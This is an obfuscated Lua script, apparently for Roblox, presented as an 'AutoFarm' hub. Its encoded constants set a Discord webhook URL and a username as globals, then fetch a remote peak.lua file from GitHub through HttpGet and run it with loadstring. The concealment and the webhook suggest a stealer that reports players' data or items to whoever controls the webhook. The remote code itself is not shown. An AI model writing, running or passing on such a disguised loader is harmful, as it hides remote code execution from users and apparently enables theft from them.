--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.9.15) ~  Much Love, Ferib 

]]--

local v0=tonumber;local v1=string.byte;local v2=string.char;local v3=string.sub;local v4=string.gsub;local v5=string.rep;local v6=table.concat;local v7=table.insert;local v8=math.ldexp;local v9=getfenv or function()return _ENV;end ;local v10=setmetatable;local v11=pcall;local v12=select;local v13=unpack or table.unpack ;local v14=tonumber;local function v15(v16,v17,...)local v18=1;local v19;v16=v4(v3(v16,5),"..",function(v30)if (v1(v30,2)==79) then v19=v0(v3(v30,1,1));return "";else local v70=v2(v0(v30,16));if v19 then local v78=v5(v70,v19);v19=nil;return v78;else return v70;end end end);local function v20(v31,v32,v33)if v33 then local v71=(v31/((5 -3)^(v32-(2 -1))))%((3 -1)^(((v33-(878 -(282 + 595))) -(v32-(1638 -(1523 + 26 + 88)))) + (2 -1))) ;return v71-(v71%((958 -(892 + 65)) -0)) ;else local v72=1065 -(68 + 997) ;local v73;while true do if (v72==(1270 -(226 + 1044))) then v73=((1481 -860) -(555 + 64))^(v32-(932 -(857 + 74))) ;return (((v31%(v73 + v73))>=v73) and (569 -(367 + 201))) or (0 + 0) ;end end end end local function v21()local v34=0;local v35;while true do if (v34==((181 -(67 + 113)) -0)) then return v35;end if (v34==0) then v35=v1(v16,v18,v18);v18=v18 + (1 -0) ;v34=351 -(87 + 263) ;end end end local function v22()local v36,v37=v1(v16,v18,v18 + 2 );v18=v18 + 2 + 0 ;return (v37 * (628 -372)) + v36 ;end local function v23()local v38,v39,v40,v41=v1(v16,v18,v18 + 3 + 0 );v18=v18 + (15 -11) ;return (v41 * (16778168 -(802 + 150))) + (v40 * ((128432 + 48012) -(111905 -(915 + 82)))) + (v39 * (464 -208)) + v38 ;end local function v24()local v42=0 -0 ;local v43;local v44;local v45;local v46;local v47;local v48;while true do if (v42==(1 + 0 + 0)) then v45=1 -0 ;v46=(v20(v44,1188 -(1069 + 118) ,45 -25 ) * ((3 -1)^(6 + 26))) + v43 ;v42=3 -(3 -2) ;end if (v42==(3 + 0)) then if (v47==(791 -(368 + 423))) then if (v46==(0 -0)) then return v48 * 0 ;else local v96=18 -(10 + 8) ;while true do if (v96==(0 -(0 -0))) then v47=443 -(416 + 26) ;v45=0 -0 ;break;end end end elseif (v47==(879 + 1168)) then return ((v46==(0 -0)) and (v48 * ((860 -(814 + 45))/(438 -((357 -212) + 293))))) or (v48 * NaN) ;end return v8(v48,v47-((79 + 1374) -(44 + 386)) ) * (v45 + (v46/((1488 -(998 + 488))^(17 + 35)))) ;end if (v42==(0 + 0)) then v43=v23();v44=v23();v42=773 -(201 + 202 + 369) ;end if (v42==2) then v47=v20(v44,21,31);v48=((v20(v44,1170 -(116 + 1022) )==1) and  -(4 -3)) or 1 ;v42=3;end end end local function v25(v49)local v50;if  not v49 then local v74=1080 -(1020 + 60) ;while true do if (v74==((349 + 536) -(261 + 624))) then v49=v23();if (v49==(0 -0)) then return "";end break;end end end v50=v3(v16,v18,(v18 + v49) -(4 -3) );v18=v18 + v49 ;local v51={};for v68=1, #v50 do v51[v68]=v2(v1(v3(v50,v68,v68)));end return v6(v51);end local v26=v23;local function v27(...)return {...},v12("#",...);end local function v28()local v52=0;local v53;local v54;local v55;local v56;local v57;local v58;local v59;local v60;while true do if ((5 -1)==v52) then while true do if ((1784 -(599 + 1185))==v53) then local v95=0 + 0 ;while true do if (v95==(0 + 0)) then v54=0;v55=nil;v95=575 -(507 + 67) ;end if (v95~=1) then else v53=1;break;end end end if ((1750 -(1013 + 736))~=v53) then else v56=nil;v57=nil;v53=2 + 0 ;end if (v53~=3) then else v60=nil;while true do local v97=0 -0 ;while true do if (v97==(0 -0)) then if (v54~=0) then else v55={};v56={};v57={};v58={v55,v56,nil,v57};v54=1;end if (1==v54) then local v104=0;while true do if (v104~=(5 -3)) then else v54=287 -(134 + 151) ;break;end if (v104==(1666 -(970 + 695))) then for v112=1 -0 ,v59 do local v113=0;local v114;local v115;local v116;while true do if (v113~=0) then else v114=1990 -(582 + 1408) ;v115=nil;v113=1;end if (v113==(3 -2)) then v116=nil;while true do if (v114==(0 -0)) then local v174=0;local v175;while true do if (v174==(0 -0)) then v175=1824 -(1195 + 629) ;while true do if (v175==(0 -0)) then v115=v21();v116=nil;v175=1;end if (v175==1) then v114=242 -(187 + 54) ;break;end end break;end end end if (v114==1) then if (v115==(781 -(162 + 618))) then v116=v21()~=(0 + 0) ;elseif (v115==(2 + 0)) then v116=v24();elseif (v115==(6 -3)) then v116=v25();end v60[v112]=v116;break;end end break;end end end v58[4 -1 ]=v21();v104=1 + 1 ;end if (v104==0) then v59=v23();v60={};v104=1637 -(1373 + 263) ;end end end v97=1001 -(451 + 549) ;end if (v97==1) then if (v54==2) then for v105=1,v23() do local v106=0 + 0 ;local v107;local v108;while true do if (v106~=(0 -0)) then else local v117=0 -0 ;while true do if (v117~=(1384 -(746 + 638))) then else v107=0 + 0 ;v108=nil;v117=1 -0 ;end if (v117~=(342 -(218 + 123))) then else v106=1582 -(1535 + 46) ;break;end end end if (1==v106) then while true do if (0==v107) then v108=v21();if (v20(v108,1 + 0 ,1)~=0) then else local v163=0;local v164;local v165;local v166;local v167;while true do if (v163~=(1 + 1)) then else while true do if (v164==(560 -(306 + 254))) then local v182=0;while true do if (v182==(0 + 0)) then v165=v20(v108,3 -1 ,1470 -(899 + 568) );v166=v20(v108,3 + 1 ,14 -8 );v182=1;end if (v182==(604 -(268 + 335))) then v164=1;break;end end end if (v164~=1) then else local v183=290 -(60 + 230) ;local v184;while true do if (v183~=0) then else v184=572 -(426 + 146) ;while true do if (v184==(1 + 0)) then v164=2;break;end if (v184==0) then local v193=0;while true do if (v193==0) then v167={v22(),v22(),nil,nil};if (v165==0) then local v194=0;local v195;while true do if (v194==(0 + 0)) then v195=0;while true do if (v195==0) then v167[1027 -(706 + 318) ]=v22();v167[1255 -(721 + 530) ]=v22();break;end end break;end end elseif (v165==(1272 -(945 + 326))) then v167[3]=v23();elseif (v165==2) then v167[7 -4 ]=v23() -(2^(15 + 1)) ;elseif (v165~=(703 -(271 + 429))) then else local v200=0 + 0 ;while true do if (v200==0) then v167[3]=v23() -(2^(1516 -(1408 + 92))) ;v167[4]=v22();break;end end end v193=1;end if (v193==1) then v184=1;break;end end end end break;end end end if (v164~=3) then else if (v20(v166,1089 -(461 + 625) ,1291 -(993 + 295) )~=(1 + 0)) then else v167[4]=v60[v167[4]];end v55[v105]=v167;break;end if (v164==2) then local v186=1171 -(418 + 753) ;while true do if (v186==(0 + 0)) then if (v20(v166,1,1)==1) then v167[2]=v60[v167[1 + 1 ]];end if (v20(v166,2,2)==(1 + 0)) then v167[3]=v60[v167[3]];end v186=1 + 0 ;end if (v186==(530 -(406 + 123))) then v164=3;break;end end end end break;end if (v163==1) then local v180=0;while true do if (v180==1) then v163=2;break;end if (v180==(1769 -(1749 + 20))) then v166=nil;v167=nil;v180=1 + 0 ;end end end if (0==v163) then local v181=1322 -(1249 + 73) ;while true do if (v181==0) then v164=0;v165=nil;v181=1 + 0 ;end if (v181==1) then v163=1146 -(466 + 679) ;break;end end end end end break;end end break;end end end for v109=1,v23() do v56[v109-1 ]=v28();end return v58;end break;end end end break;end if (v53==(4 -2)) then v58=nil;v59=nil;v53=8 -5 ;end end break;end if (1~=v52) then else v55=nil;v56=nil;v52=2;end if (v52==(1903 -(106 + 1794))) then v59=nil;v60=nil;v52=2 + 2 ;end if (v52==0) then v53=0;v54=nil;v52=1 + 0 ;end if (2~=v52) then else v57=nil;v58=nil;v52=3;end end end local function v29(v61,v62,v63)local v64=0;local v65;local v66;local v67;while true do if (v64==0) then v65=v61[1];v66=v61[2];v64=1;end if (1==v64) then v67=v61[3];return function(...)local v79=v65;local v80=v66;local v81=v67;local v82=v27;local v83=1;local v84= -1;local v85={};local v86={...};local v87=v12("#",...) -1 ;local v88={};local v89={};for v93=0,v87 do if (v93>=v81) then v85[v93-v81 ]=v86[v93 + 1 ];else v89[v93]=v86[v93 + 1 ];end end local v90=(v87-v81) + 1 ;local v91;local v92;while true do local v94=0;while true do if (1==v94) then if (v92<=9) then if (v92<=4) then if (v92<=1) then if (v92>0) then v89[v91[2]]=v63[v91[3]];else v89[v91[2]]();end elseif (v92<=2) then local v120=0;local v121;local v122;local v123;local v124;while true do if (v120==0) then v121=v91[2];v122,v123=v82(v89[v121](v13(v89,v121 + 1 ,v91[3])));v120=1;end if (v120==1) then v84=(v123 + v121) -1 ;v124=0;v120=2;end if (v120==2) then for v159=v121,v84 do v124=v124 + 1 ;v89[v159]=v122[v124];end break;end end elseif (v92==3) then local v138=v91[2];v89[v138]=v89[v138](v13(v89,v138 + 1 ,v84));elseif (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end elseif (v92<=6) then if (v92==5) then local v125=v91[2];v89[v125]=v89[v125](v13(v89,v125 + 1 ,v84));else v89[v91[2]]();end elseif (v92<=7) then v83=v91[3];elseif (v92==8) then v89[v91[2]]=v91[3];else do return;end end elseif (v92<=14) then if (v92<=11) then if (v92>10) then local v128=0;local v129;local v130;while true do if (v128==0) then v129=v91[2];v130=v89[v91[3]];v128=1;end if (v128==1) then v89[v129 + 1 ]=v130;v89[v129]=v130[v91[4]];break;end end else v89[v91[2]][v91[3]]=v91[4];end elseif (v92<=12) then v83=v91[3];elseif (v92==13) then local v142=0;local v143;local v144;local v145;local v146;while true do if (v142==2) then for v177=v143,v84 do v146=v146 + 1 ;v89[v177]=v144[v146];end break;end if (v142==0) then v143=v91[2];v144,v145=v82(v89[v143](v13(v89,v143 + 1 ,v91[3])));v142=1;end if (v142==1) then v84=(v145 + v143) -1 ;v146=0;v142=2;end end else local v147=0;local v148;local v149;while true do if (v147==0) then v148=v91[2];v149=v89[v91[3]];v147=1;end if (v147==1) then v89[v148 + 1 ]=v149;v89[v148]=v149[v91[4]];break;end end end elseif (v92<=16) then if (v92>15) then if (v89[v91[2]]==v91[4]) then v83=v83 + 1 ;else v83=v91[3];end else v89[v91[2]][v91[3]]=v91[4];end elseif (v92<=17) then v89[v91[2]]=v63[v91[3]];elseif (v92>18) then do return;end else v89[v91[2]]=v91[3];end v83=v83 + 1 ;break;end if (v94==0) then v91=v79[v83];v92=v91[1];v94=1;end end end end;end end end return v29(v28(),{},v17)(...);end v15("LOL!0D3O00028O00026O00F03F03023O005F47030A3O00576562682O6F6B55726C03793O00682O7470733A2O2F646973636F72642E636F6D2F6170692F776562682O6F6B732F2O313436333832353035312O303937363136382F43567144504878756F46454B6F454F66592O61513335376E6B6A50764E785F6130544D4C6F346A475778362D3564423530436E63354676556E397235747348692O6A614F030A3O006C6F6164737472696E6703043O0067616D6503073O00482O747047657403463O00682O7470733A2O2F7261772E67697468756275736572636F6E74656E742E636F6D2F4A61792O696F6365616E2O692F5065616B4F6E546F702F6D61696E2F7065616B2E6C756103083O00557365726E616D65030B3O0047616D65727A323331343603073O004875624E616D6503083O004175746F4661726D00163O002O123O00013O0026103O000D000100020004073O000D0001001201000100033O00300F000100040005001201000100063O001201000200073O00200E000200020008002O12000400094O000D000200044O000300013O00024O0001000100010004073O001500010026103O0001000100010004073O00010001001201000100033O00300F0001000A000B001201000100033O00300F0001000C000D002O123O00023O0004073O000100012O00133O00017O00",v9(),...);
